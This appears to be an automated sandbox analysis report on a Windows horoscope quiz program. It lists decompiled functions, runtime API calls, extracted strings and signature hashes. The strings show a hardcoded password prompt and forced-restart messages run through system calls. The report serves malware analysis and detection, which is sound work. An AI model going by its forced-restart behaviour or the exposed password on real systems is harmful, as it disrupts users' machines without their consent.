                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • __wsystem.LIBCMT ref: 013D4533
                                                                          • _wprintf.LIBCMT ref: 013D4558
                                                                          • _wprintf.LIBCMT ref: 013D45C7
                                                                          • _wprintf.LIBCMT ref: 013D45D1
                                                                          • _wprintf.LIBCMT ref: 013D45FC
                                                                          • _wprintf.LIBCMT ref: 013D4606
                                                                          • __wsystem.LIBCMT ref: 013D461D
                                                                          • __wsystem.LIBCMT ref: 013D4645
                                                                          • _wprintf.LIBCMT ref: 013D466A
                                                                          • _wprintf.LIBCMT ref: 013D467E
                                                                          • _wprintf.LIBCMT ref: 013D4696
                                                                          • _wprintf.LIBCMT ref: 013D46B1
                                                                          • _wprintf.LIBCMT ref: 013D46D9
                                                                          • _wprintf.LIBCMT ref: 013D46FE
                                                                          • _wprintf.LIBCMT ref: 013D4712
                                                                          • __wsystem.LIBCMT ref: 013D4729
                                                                          • __wsystem.LIBCMT ref: 013D4B01
                                                                          • _wprintf.LIBCMT ref: 013D4B16
                                                                          • _wprintf.LIBCMT ref: 013D4B2E
                                                                          • _wprintf.LIBCMT ref: 013D4B4C
                                                                          • _wprintf.LIBCMT ref: 013D4B7C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_free_wscanf
                                                                          • String ID: Enter any key.....$WE HOPE THAT IT WAS HELPFUL$%s$Enter any key....$ THE SYSTEM WILL RESTART IN FEW SECONDS!!!$%d$------------------------------------------------------------------$Age=%d$Enter any key to continue...$HERE IS WHAT YOU ARE!!!$LEO AND AQUARIUS LOVE COMPATIBILITY$LEO AND ARIES LOVE COMPATIBILITY$LEO AND CANCER LOVE COMPATIBILITY$LEO AND CAPRICORN LOVE COMPATIBILITY$LEO AND GEMINI LOVE COMPATIBILITY$LEO AND LEO LOVE COMPATIBILITY$LEO AND LIBRA LOVE COMPATIBILITY$LEO AND PISCES LOVE COMPATIBILITY$LEO AND SAGGITARIUS LOVE COMPATIBILITY$LEO AND SCORPIO LOVE COMPATIBILITY$LEO AND TAURUS LOVE COMPATIBILITY$LEO AND VIRGO LOVE COMPATIBILITY$Name: %s$Sex=%c$YOUR LUCKY NUMBERS ARE: %d$cls$gfff$gfff
                                                                          • API String ID: 2876428006-1281201319
                                                                          • Opcode ID: 0943885ae410186814736686ea87e5a8405950fd6a0d6daaed4c689c076d8c8d
                                                                          • Instruction ID: 41edb39f70c1448e567adf64096d87d122a35a67d4ffb8046de9c10763a329d6
                                                                          • Opcode Fuzzy Hash: 0943885ae410186814736686ea87e5a8405950fd6a0d6daaed4c689c076d8c8d
                                                                          • Instruction Fuzzy Hash: 04E1B2B760024AABD710FFEEBC41D6F76ADAFA639CF02411CF55066604DA7488158B72
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D3610, Relevance: 135.2, APIs: 49, Strings: 28, Instructions: 460COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsystem.LIBCMT ref: 013D361E
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D3636
                                                                          • _wprintf.LIBCMT ref: 013D3658
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D3679
                                                                            • Part of subcall function 013D16D0: _wprintf.LIBCMT ref: 013D16DF
                                                                            • Part of subcall function 013D16D0: _wprintf.LIBCMT ref: 013D16F3
                                                                            • Part of subcall function 013D16D0: _wprintf.LIBCMT ref: 013D1707
                                                                            • Part of subcall function 013D16D0: _wprintf.LIBCMT ref: 013D171B
                                                                            • Part of subcall function 013D16D0: _wprintf.LIBCMT ref: 013D172F
                                                                            • Part of subcall function 013D16D0: _wprintf.LIBCMT ref: 013D1743
                                                                            • Part of subcall function 013D16D0: _wprintf.LIBCMT ref: 013D1757
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • __wsystem.LIBCMT ref: 013D36BC
                                                                          • _wprintf.LIBCMT ref: 013D36DE
                                                                          • _wprintf.LIBCMT ref: 013D3751
                                                                          • _wprintf.LIBCMT ref: 013D375B
                                                                          • _wprintf.LIBCMT ref: 013D3786
                                                                          • _wprintf.LIBCMT ref: 013D3790
                                                                          • __wsystem.LIBCMT ref: 013D37A7
                                                                          • __wsystem.LIBCMT ref: 013D37CC
                                                                          • _wprintf.LIBCMT ref: 013D37EE
                                                                          • _wprintf.LIBCMT ref: 013D3802
                                                                          • _wprintf.LIBCMT ref: 013D381D
                                                                          • _wprintf.LIBCMT ref: 013D382E
                                                                          • _wprintf.LIBCMT ref: 013D3850
                                                                          • _wprintf.LIBCMT ref: 013D3871
                                                                          • _wprintf.LIBCMT ref: 013D3885
                                                                          • __wsystem.LIBCMT ref: 013D389C
                                                                          • __wsystem.LIBCMT ref: 013D3C4D
                                                                          • _wprintf.LIBCMT ref: 013D3C62
                                                                          • _wprintf.LIBCMT ref: 013D3C7A
                                                                          • _wprintf.LIBCMT ref: 013D3C98
                                                                          • _wprintf.LIBCMT ref: 013D3CCE
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_free_wscanf
                                                                          • String ID: Enter any key.....$WE HOPE THAT IT WAS HELPFUL$%s$Enter any key....$ THE SYSTEM WILL RESTART IN FEW SECONDS!!!$#$%d$------------------------------------------------------------------$Age=%d$Enter any key to continue...$GEMINI AND AQUARIUS LOVE COMPATIBILITY$GEMINI AND ARIES LOVE COMPATIBILITY$GEMINI AND CANCER LOVE COMPATIBILITY$GEMINI AND CAPRICORN LOVE COMPATIBILITY$GEMINI AND GEMINI LOVE COMPATIBILITY$GEMINI AND LEO LOVE COMPATIBILITY$GEMINI AND LIBRA LOVE COMPATIBILITY$GEMINI AND PISCES LOVE COMPATIBILITY$GEMINI AND SAGGITARIUS LOVE COMPATIBILITY$GEMINI AND SCORPIO LOVE COMPATIBILITY$GEMINI AND TAURUS LOVE COMPATIBILITY$GEMINI AND VIRGO LOVE COMPATIBILITY$HERE IS WHAT YOU ARE!!!$Name: %s$Sex=%c$YOUR LUCKY NUMBERS ARE: %d$cls$gfff
                                                                          • API String ID: 2876428006-2547633800
                                                                          • Opcode ID: 14fdc0f5d0688a1a64a088ac76b2fa76e4a8d52620106e1794c8c3100171aeed
                                                                          • Instruction ID: 206390f1615af490f3252f23af979dbe96da8d1300fcf1b5db73a41fe7f74a53
                                                                          • Opcode Fuzzy Hash: 14fdc0f5d0688a1a64a088ac76b2fa76e4a8d52620106e1794c8c3100171aeed
                                                                          • Instruction Fuzzy Hash: 07E1F2B764024ABBCB14BFEFBC45E5F7A6CABE679CF01401CE55466308DA70990487B2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D6220, Relevance: 135.2, APIs: 49, Strings: 28, Instructions: 456COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsystem.LIBCMT ref: 013D622E
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D6246
                                                                          • _wprintf.LIBCMT ref: 013D6268
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D6289
                                                                            • Part of subcall function 013D19D0: _wprintf.LIBCMT ref: 013D19DF
                                                                            • Part of subcall function 013D19D0: _wprintf.LIBCMT ref: 013D19F3
                                                                            • Part of subcall function 013D19D0: _wprintf.LIBCMT ref: 013D1A07
                                                                            • Part of subcall function 013D19D0: _wprintf.LIBCMT ref: 013D1A1B
                                                                            • Part of subcall function 013D19D0: _wprintf.LIBCMT ref: 013D1A2F
                                                                            • Part of subcall function 013D19D0: _wprintf.LIBCMT ref: 013D1A43
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • __wsystem.LIBCMT ref: 013D62BF
                                                                          • _wprintf.LIBCMT ref: 013D62E1
                                                                          • _wprintf.LIBCMT ref: 013D6353
                                                                          • _wprintf.LIBCMT ref: 013D635D
                                                                          • _wprintf.LIBCMT ref: 013D6388
                                                                          • _wprintf.LIBCMT ref: 013D6392
                                                                          • __wsystem.LIBCMT ref: 013D63A9
                                                                          • __wsystem.LIBCMT ref: 013D63CE
                                                                          • _wprintf.LIBCMT ref: 013D63F0
                                                                          • _wprintf.LIBCMT ref: 013D6404
                                                                          • _wprintf.LIBCMT ref: 013D641F
                                                                          • _wprintf.LIBCMT ref: 013D6430
                                                                          • _wprintf.LIBCMT ref: 013D6454
                                                                          • _wprintf.LIBCMT ref: 013D646F
                                                                          • _wprintf.LIBCMT ref: 013D6483
                                                                          • __wsystem.LIBCMT ref: 013D649A
                                                                          • __wsystem.LIBCMT ref: 013D684B
                                                                          • _wprintf.LIBCMT ref: 013D6860
                                                                          • _wprintf.LIBCMT ref: 013D6878
                                                                          • _wprintf.LIBCMT ref: 013D6896
                                                                          • _wprintf.LIBCMT ref: 013D68C5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__wsystem$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s_free_wscanf
                                                                          • String ID: Enter any key.....$WE HOPE THAT IT WAS HELPFUL$%s$Enter any key....$ THE SYSTEM WILL RESTART IN FEW SECONDS!!!$%d$+$------------------------------------------------------------------$Age=%d$Enter any key to continue...$HERE IS WHAT YOU ARE!!!$Name: %s$SAGGITARIUS AND AQUARIUS LOVE COMPATIBILITY$SAGGITARIUS AND ARIES LOVE COMPATIBILITY$SAGGITARIUS AND CANCER LOVE COMPATIBILITY$SAGGITARIUS AND CAPRICORN LOVE COMPATIBILITY$SAGGITARIUS AND GEMINI LOVE COMPATIBILITY$SAGGITARIUS AND LEO LOVE COMPATIBILITY$SAGGITARIUS AND LIBRA LOVE COMPATIBILITY$SAGGITARIUS AND PISCES LOVE COMPATIBILITY$SAGGITARIUS AND SAGGITARIUS LOVE COMPATIBILITY$SAGGITARIUS AND SCORPIO LOVE COMPATIBILITY$SAGGITARIUS AND TAURUS LOVE COMPATIBILITY$SAGGITARIUS AND VIRGO LOVE COMPATIBILITY$Sex=%c$YOUR LUCKY NUMBERS ARE: %d$cls$gfff
                                                                          • API String ID: 2876428006-1571935990
                                                                          • Opcode ID: aee2af5288e504e265e4e3af44a4ce03dea34bd0988f569278ff8c36b7e194c5
                                                                          • Instruction ID: 29b59b54544a7f6ea8e65e603b680d0d0fe4d91f2556979e3288e3f59e59bd67
                                                                          • Opcode Fuzzy Hash: aee2af5288e504e265e4e3af44a4ce03dea34bd0988f569278ff8c36b7e194c5
                                                                          • Instruction Fuzzy Hash: 2DE114B7A4024ABBC310BBEFBC46E1F7A6EABE679CF01401CF15466304DA74850487B2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013E36A8, Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,013DC670), ref: 013E36B0
                                                                          • __mtterm.LIBCMT ref: 013E36BC
                                                                            • Part of subcall function 013E33F5: DecodePointer.KERNEL32(00000009,013E381E,?,013DC670), ref: 013E3406
                                                                            • Part of subcall function 013E33F5: TlsFree.KERNEL32(00000022,013E381E,?,013DC670), ref: 013E3420
                                                                          • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 013E36D2
                                                                          • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 013E36DF
                                                                          • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 013E36EC
                                                                          • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 013E36F9
                                                                          • TlsAlloc.KERNEL32(?,013DC670), ref: 013E3749
                                                                          • TlsSetValue.KERNEL32(00000000,?,013DC670), ref: 013E3764
                                                                          • __init_pointers.LIBCMT ref: 013E376E
                                                                          • EncodePointer.KERNEL32(?,013DC670), ref: 013E377F
                                                                          • EncodePointer.KERNEL32(?,013DC670), ref: 013E378C
                                                                          • EncodePointer.KERNEL32(?,013DC670), ref: 013E3799
                                                                          • EncodePointer.KERNEL32(?,013DC670), ref: 013E37A6
                                                                          • DecodePointer.KERNEL32(013E3579,?,013DC670), ref: 013E37C7
                                                                          • __calloc_crt.LIBCMT ref: 013E37DC
                                                                          • DecodePointer.KERNEL32(00000000,?,013DC670), ref: 013E37F6
                                                                          • __initptd.LIBCMT ref: 013E3801
                                                                          • GetCurrentThreadId.KERNEL32 ref: 013E3808
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                          • API String ID: 3732613303-3819984048
                                                                          • Opcode ID: 95eb2114b20717d6ac6b15e708de62fcbb0ae9876444ebac589e2df500953f8b
                                                                          • Instruction ID: 553ee92a967b64e61ada3b7a63d79ab7eaebccb36871695cb6dd7f16a31b36af
                                                                          • Opcode Fuzzy Hash: 95eb2114b20717d6ac6b15e708de62fcbb0ae9876444ebac589e2df500953f8b
                                                                          • Instruction Fuzzy Hash: 50311775908321EADB31ABBDA80CA197EEDBB4576CF10452EE518972DCEB708404CFA0
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D1000, Relevance: 36.9, APIs: 11, Strings: 10, Instructions: 127COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __wsystem.LIBCMT ref: 013D1015
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _memset.LIBCMT ref: 013D1039
                                                                          • _wprintf.LIBCMT ref: 013D106E
                                                                            • Part of subcall function 013EDBFD: __lock.LIBCMT ref: 013EDC0B
                                                                            • Part of subcall function 013EDBFD: __getch_nolock.LIBCMT ref: 013EDC15
                                                                          • _wprintf.LIBCMT ref: 013D109C
                                                                          • _wprintf.LIBCMT ref: 013D10EE
                                                                          • _wprintf.LIBCMT ref: 013D1112
                                                                          • _wprintf.LIBCMT ref: 013D111C
                                                                          • _wprintf.LIBCMT ref: 013D113C
                                                                          • _wprintf.LIBCMT ref: 013D1150
                                                                          • _wprintf.LIBCMT ref: 013D1170
                                                                          • _wprintf.LIBCMT ref: 013D11A3
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__getch_nolock__invoke_watson__lock__output_l__stbuf__waccess_s__wdupenv_s__wsystem_free_memset
                                                                          • String ID: ACCESS DENIED!!$ACCESS GRANTED!!$%s$Enter password: $MORE THAN 3 FAILURES!!$SYSTEM RESTARTS IN %d SECONDS$TRY AGAIN??(Y/N)$cls$occlumency$y
                                                                          • API String ID: 1284862092-3435188476
                                                                          • Opcode ID: e4aa4a3de6ca105a9274fe5748b050afb46c00d0052a9ef1420976eeb221151f
                                                                          • Instruction ID: ac3911954f0bd2ff725b97e0a142c44c702f5360b406ad628801a38c92a5d0bd
                                                                          • Opcode Fuzzy Hash: e4aa4a3de6ca105a9274fe5748b050afb46c00d0052a9ef1420976eeb221151f
                                                                          • Instruction Fuzzy Hash: 3C418F33B8428657D720777EBC02B9A7B395B6732CF05415CD94867346E6E5814887A2
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D1D50, Relevance: 35.0, APIs: 11, Strings: 9, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__output_l__stbuf_flsall_vwscanf_wscanf
                                                                          • String ID: -------------------------------------------------------------------$1.ARIES 2.TAURUS$11.AQUARIUS 12.PISCES$3.GEMINI 4.CANCER$5.LEO 6.VIRGO$7.LIBRA 8.SCORPIO$9.SAGGITARIUS10.CAPRICORN$Enter Your Choice: $Enter your Partnes's horoscope:
                                                                          • API String ID: 3874819845-3891143870
                                                                          • Opcode ID: abbe3de789d09ed9b1c62c7951b7f561506295eb221a417d4725f756da118281
                                                                          • Instruction ID: 8c207f5e952032ef5a65fbc2cccaa6f44234feaafb968f425dceab12a47a34dd
                                                                          • Opcode Fuzzy Hash: abbe3de789d09ed9b1c62c7951b7f561506295eb221a417d4725f756da118281
                                                                          • Instruction Fuzzy Hash: 22019E765453CB7EC610BB9AF909F0DBB69E75772CF43062DE2246A628EFF004045761
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D1C60, Relevance: 35.0, APIs: 11, Strings: 9, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__output_l__stbuf_flsall_vwscanf_wscanf
                                                                          • String ID: -------------------------------------------------------------------$1.ABOUT YOURSELF$2.FORTUNES$3.LUCKY NUMBERS$4.LOVE COMPATIBILITY$5.ADMINISTRATOR TOOLS$6.EXIT$Enter Your Choice: $Enter any other key to restart the program.
                                                                          • API String ID: 3874819845-2579874771
                                                                          • Opcode ID: 55026bf9d687023a1c53a5f3841a56684da3699a65fbf2491cfa039cd34bfa79
                                                                          • Instruction ID: 258263adea466c69063cfb0b4a36e71ca6b25c88d873bb275159896fe8e8d580
                                                                          • Opcode Fuzzy Hash: 55026bf9d687023a1c53a5f3841a56684da3699a65fbf2491cfa039cd34bfa79
                                                                          • Instruction Fuzzy Hash: D601DE7A1453CABEC611BBDABA09E0DB759AB5776CF43071CF21029628EBF000049761
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D59BA, Relevance: 29.8, APIs: 9, Strings: 8, Instructions: 52COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 013DB3BC: _flsall.LIBCMT ref: 013DB3D0
                                                                          • __wsystem.LIBCMT ref: 013D59CD
                                                                            • Part of subcall function 013DB418: __wdupenv_s.LIBCMT ref: 013DB433
                                                                            • Part of subcall function 013DB418: __invoke_watson.LIBCMT ref: 013DB449
                                                                            • Part of subcall function 013DB418: __waccess_s.LIBCMT ref: 013DB465
                                                                            • Part of subcall function 013DB418: _free.LIBCMT ref: 013DB4E9
                                                                          • _wprintf.LIBCMT ref: 013D59E2
                                                                          • _wprintf.LIBCMT ref: 013D5A18
                                                                          • _wprintf.LIBCMT ref: 013D5A2C
                                                                          • _wprintf.LIBCMT ref: 013D5A40
                                                                          • _wprintf.LIBCMT ref: 013D5A54
                                                                          • _wprintf.LIBCMT ref: 013D5A68
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C73
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C87
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1C9B
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CAF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CC3
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CD7
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CEB
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1CFF
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D13
                                                                            • Part of subcall function 013D1C60: _wprintf.LIBCMT ref: 013D1D27
                                                                            • Part of subcall function 013D1C60: _wscanf.LIBCMT ref: 013D1D40
                                                                          • _wprintf.LIBCMT ref: 013D59FA
                                                                            • Part of subcall function 013DB9F5: __stbuf.LIBCMT ref: 013DBA43
                                                                            • Part of subcall function 013DB9F5: __output_l.LIBCMT ref: 013DBA5B
                                                                            • Part of subcall function 013DB9F5: __ftbuf.LIBCMT ref: 013DBA6C
                                                                          • _wprintf.LIBCMT ref: 013D5A9A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.241760382.00000000013D1000.00000020.00020000.sdmp, Offset: 013D0000, based on PE: true
                                                                          • Associated: 00000000.00000002.241755705.00000000013D0000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241777844.00000000013EF000.00000002.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241787301.00000000013FA000.00000004.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241791824.00000000013FB000.00000040.00020000.sdmp Download File
                                                                          • Associated: 00000000.00000002.241798152.0000000001400000.00000002.00020000.sdmp Download File
                                                                          Similarity
                                                                          • API ID: _wprintf$__ftbuf__invoke_watson__output_l__stbuf__waccess_s__wdupenv_s__wsystem_flsall_free_wscanf
                                                                          • String ID: THE SYSTEM WILL RESTART IN FEW SECONDS!!!$Age=%d$Name: %s$Sex=%c$Your horoscope sign is Libra-The Balance$___.' '.___$____________$cls
                                                                          • API String ID: 516305062-3544761710
                                                                          • Opcode ID: db41dbbf24f7ce4766aa5a51e563f1c05eefbf5634889c77fab909fbfceb5560
                                                                          • Instruction ID: 3e48f678b0ee24bb0e9e0205dbd31edfe1638778a86d091165a1a0fcd3c6a2ca
                                                                          • Opcode Fuzzy Hash: db41dbbf24f7ce4766aa5a51e563f1c05eefbf5634889c77fab909fbfceb5560
                                                                          • Instruction Fuzzy Hash: DA1182B7540386AEC7107FEBFC0AD5EB768BB5772DF02061CE61426208EB7004088766
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 013D770A, Relevance: 28.0, APIs: 8, Strings: 8, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 013DB3BC: _flsall.LIBCMT ref: 013DB3D0
                                                                            • Part of subcall function 013D1E40: __wsystem.LIBCMT ref: 013D1E4D
                                                                            • Part of subcall function 013D1E40: __fread_nolock.LIBCMT ref: 013D1E78
